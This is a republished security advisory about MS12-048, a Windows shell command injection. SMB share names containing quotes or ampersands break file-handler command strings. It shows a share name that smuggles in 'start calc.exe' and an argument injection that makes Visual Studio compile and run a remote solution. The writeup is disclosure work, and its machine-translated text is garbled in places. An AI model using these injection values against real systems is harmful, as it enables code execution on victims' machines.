Microsoft Windows Shell Command Injection-MS12-048 (CVE-20

Source: Internet
Author: User

Background
 
Windows File Association allows an application to define a handler that shoshould be called for each operation on a specific file type.
 
For example, WinRAR registers the file type. RAR in the following manner:
 
 




The Open action defined for this file type dictates how the handler shoshould be called upon opening the file.
 
The command that will be executed for this example of WinRAR is:
 
"C: \ Program Files \ WinRAR \ WinRAR.exe" "% 1"
 
(Where the % 1 is replaced with the filename that the client clicked on)
 
Theoretically if an attacker was able to create a file called
 
Stu "ff.rar
 
He will be able to break the command string.
 
Of course creating such a file under Windows seems to be impossible
 
 
 
Linux operating systems unlike Windows, do not limit the use of these special characters as part of a file's name.
 
Meaning an attacker can create a file called stu "ff.rar
 
 
 
 
 
In order to actually test this theory, the Windows operating system must have some sort of access to the file currently placed on another machine.
 
 
 
 
 
Most applications will fail horribly when trying to copy this file over to the Windows machine and the few that won't, just replace the quotes (") with an underscore (_).
 
The next possibility to access this file, is through NetBIOS shares, so I 've installed a SAMBA server on my Linux machine, created some default shares and copied my malicious looking file in there.
 
 
 
Figure 1-Linux view of the file
 
 
 
Figure 2-Windows view of the file
 
Apparently Windows changes the display name for these files.
 
It does the same with folder names.
 
 
 
Vulnerability:
 
The one place missing this protection is the Share Name itself.
 
By editing the SAMBA configuration in the following way it is possible to create shares that include the forbidden special characters in their name.

 
Figure 3-Editing the SAMBA configurations
 
 
 
Figure 4-Viewing the shares under Windows
 
When executing a RAR file from the regular share2 folder, all works well.
 
However when double-clicking a RAR in the second share
 
 
 
WinRAR cannot seem to find the requested file
 
 


 
 
Viewing the created WinRAR.exe process in Process Explorer reveals the injection has worked.
 
 

 
Example attack scenario #1:
 
The following attack scenario will allow the attacker to create a malicious Share that targets the "CMD Prompt Here" behavior.
 




 
 
The way that "CMD Prompt Here" works is by launching the following command
 
"Cmd.exe"/k cd % 1
 
 
 
An attacker is able to create a new share named:
 
Xxxxx & start calc.exe &
 
When a victim uses the "CMD Prompt Here" context menu against any folder under the share root, the executed command will be:
 
"Cmd.exe"/k cd \ 10.0.0.1 \ xxxxx & start calc.exe & \ AnyOtherFolder
 
When CMD will start it will also execute calc.exe
 
 



 
 
Example attack scenario #2:
 
 
 
The following attack scenario will allow the attacker to create a link to a visual studio solution (. SLN) file that once opened will automatically compile and execute itself.
 
By creating three SMB shares named:
 
1. Test Injection "/RunExit \ 9.148.197.235 \ share2
 
2. Test Injection"
 
3. share2
 
 
 
And the following folder tree under the mapped folder (/home/share2 in the case of this example)
 
 
 
Notice that the content of the ArgumentInjection folder is not shown.
 
It contains all the visual studio solution files and shocould not be changed.
 
The result of these statements shoshould look as such:
 
 
 
By entering the first (long) folder and opening the SLN file with the devenv.exe handler, the following command shoshould be executed:
 
 

 
 
 
The devenv.exe handler parameters es four parameters:
 
The first part of the path-"\ 9.148.197.235 \ Test Injection"
The injected parameter-/RunExit
The injected path to be used-\ 9.148.197.235 \ share2 \ ArgumentInjection. sln
The remaining part of the original path-. sln"
The first and last parameters are being ignored while the two middle parameters causes visual studio to compile and execute the desired solution.
 
Impact:
 
By using this technique, an attacker is able to inject custom arguments into every application that registered a file-type handler using the described method.
 
Remediation:
 
Microsoft has issued the following patch to address this issue
 
MS12-048 http://technet.microsoft.com/en-us/security/bulletin/ms12-048
 
Discovered by-Adi Cohen, IBM Application Security Research

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.